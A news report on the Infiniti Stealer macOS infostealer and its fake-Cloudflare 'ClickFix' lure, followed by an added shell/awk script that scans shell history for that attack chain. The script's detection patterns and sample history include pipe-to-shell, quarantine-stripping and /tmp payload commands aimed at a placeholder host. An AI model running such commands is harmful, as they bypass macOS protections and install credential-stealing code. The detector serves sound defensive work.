Infiniti Stealer malware targets Mac users’ crypto wallets via a forged verification page

Gate News, March 30: GoPlus Security disclosed that an infostealer named Infiniti Stealer is stealing Mac users’ crypto wallets and sensitive credentials through a “ClickFix” social-engineering attack. The attackers forge a highly realistic Cloudflare human-verification page that tricks users into opening Terminal and manually pasting and executing a malicious command. Once that command runs, the script removes the macOS quarantine attribute (the flag Gatekeeper relies on to decide whether a downloaded file is vetted), writes the follow-on payloads into the /tmp directory and runs them silently. The final payload is a native macOS binary compiled with Nuitka, which makes it significantly harder for security tools to detect. Once deployed, Infiniti Stealer can steal credentials from Chromium-based and Firefox browsers, the macOS Keychain, crypto wallets, and developer key files (such as .env files); it also has sandbox-detection and delayed-execution capabilities to evade analysis.
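The command chain the article describes (quarantine attribute stripped, payload staged under /tmp, a remote or base64-decoded script piped straight into a shell) leaves a recognisable trace in the victim’s shell history. The following is an added example, not code from GoPlus or from the report: a POSIX shell function that scans command lines for those indicators and tags each match. The indicator patterns and the sample history are constructed for illustration and are not the actual commands used by Infiniti Stealer.

```shell
#!/bin/sh
# Added example: scan shell-history lines for ClickFix-style command chains of
# the kind described in the article. The four indicators below are assumptions
# derived from that description, not signatures taken from the malware itself.

clickfix_scan() {
    # Reads shell commands from stdin, one per line, and prints
    # "<TAG[,TAG...]>\t<command>" for every line that matches at least one
    # indicator. Lines with no indicator produce no output; exit status is 0.
    awk '
    {
        tags = ""
        # 1. Quarantine attribute stripped: xattr -d com.apple.quarantine,
        #    or xattr -c / -rc which clears every extended attribute.
        if ($0 ~ /xattr[[:space:]]+-[a-z]*d[a-z]*[[:space:]]+com\.apple\.quarantine/ ||
            $0 ~ /xattr[[:space:]]+-[a-z]*c/)
            tags = tags "QUARANTINE_STRIP,"
        # 2. Payload made executable under /tmp, or launched from /tmp as a
        #    new command (start of line, after && ; ||, via nohup, or via a shell).
        if ($0 ~ /chmod[[:space:]]+(\+x|[0-7]+)[[:space:]]+\/tmp\// ||
            $0 ~ /(^|&&|;|\|\|)[[:space:]]*(nohup[[:space:]]+|(ba|z)?sh[[:space:]]+)?\/tmp\/[^[:space:]]+/)
            tags = tags "TMP_PAYLOAD,"
        # 3. Remote script fetched and piped straight into an interpreter.
        if ($0 ~ /(curl|wget)[^|]*\|[[:space:]]*(ba|z)?sh([[:space:]]|$)/)
            tags = tags "PIPE_TO_SHELL,"
        # 4. Base64-decoded content handed to a shell (the usual ClickFix
        #    obfuscation for the pasted one-liner).
        if ($0 ~ /base64[[:space:]]+(-d|-D|--decode)[^|]*\|[[:space:]]*(ba|z)?sh([[:space:]]|$)/)
            tags = tags "B64_DECODE_EXEC,"
        if (tags != "") {
            sub(/,$/, "", tags)      # drop the trailing comma
            printf "%s\t%s\n", tags, $0
        }
    }'
}

# Constructed sample history (not real attacker commands): two benign lines,
# three lines shaped like the chain the article describes, two more benign lines.
SAMPLE_HISTORY='ls -la ~/Downloads
xattr -l ~/Downloads/app.dmg
curl -fsSL https://example.invalid/verify | bash
xattr -d com.apple.quarantine /tmp/.update && chmod +x /tmp/.update && /tmp/.update
echo aGVsbG8gd29ybGQ= | base64 -d | sh
git status
brew install jq'

# Prints one tagged line for each of the three suspicious commands.
printf '%s\n' "$SAMPLE_HISTORY" | clickfix_scan
```

To run it against a real zsh history, strip the extended-history prefix first, e.g. `sed 's/^: [0-9]*:[0-9]*;//' ~/.zsh_history | clickfix_scan`; bash history needs no preprocessing. The patterns are deliberately narrow (a plain `ls /tmp/foo` or `xattr -l` does not fire) so the output is short enough to triage by hand, at the cost of missing chains that split the steps across several lines.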
